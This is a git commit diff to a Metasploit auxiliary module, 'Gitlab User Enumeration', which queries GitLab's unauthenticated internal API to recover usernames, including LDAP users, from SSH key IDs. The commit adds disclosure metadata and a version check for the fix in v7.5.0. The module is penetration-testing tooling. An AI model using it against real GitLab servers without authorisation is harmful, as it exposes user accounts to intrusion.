Check revision

bug/bundler_fix
Meatballs 2014-12-15 17:20:23 +00:00
parent 7216f2a971
commit 1b565b0290
1 changed files with 26 additions and 8 deletions

View File

@ -13,15 +13,23 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
super(update_info(
info,
'Name' => 'Gitlab User Enumeration',
'Description' => %q(
'Description' => "
The Gitlab 'internal' API is exposed unauthenticated on Gitlab. This
allows the username for each SSH Key ID number to be retrieved. Users
who do not have an SSH Key cannot be enumerated in this fashion.
),
who do not have an SSH Key cannot be enumerated in this fashion. LDAP
users, e.g. Active Directory users will also be returned.
This issue was fixed in Gitlab v7.5.0.
",
'Author' => 'Ben Campbell',
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 15 2014',
'References' =>
[
[ 'URL', 'https://labs.mwrinfosecurity.com/tools/' ]
]
))
register_options(
@ -62,8 +70,17 @@ class Metasploit3 < Msf::Auxiliary
info: "Gitlab Version - #{git_version}"
)
else
print_error('Unable to retrieve Gitlab version...')
return
fail_with(Failure::Unknown, 'Unable to retrieve Gitlab version...')
end
major, minor, _ = git_version.split('.')
if major.to_i > 7
fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
else
if major.to_i == 7 && minor.to_i >= 5
fail_with(Failure::NotVulnerable, "Version #{git_version} is not vulnerable.")
end
end
discover = normalize_uri(target_uri.path, internal_api, 'discover')
@ -91,3 +108,4 @@ class Metasploit3 < Msf::Auxiliary
end
end
end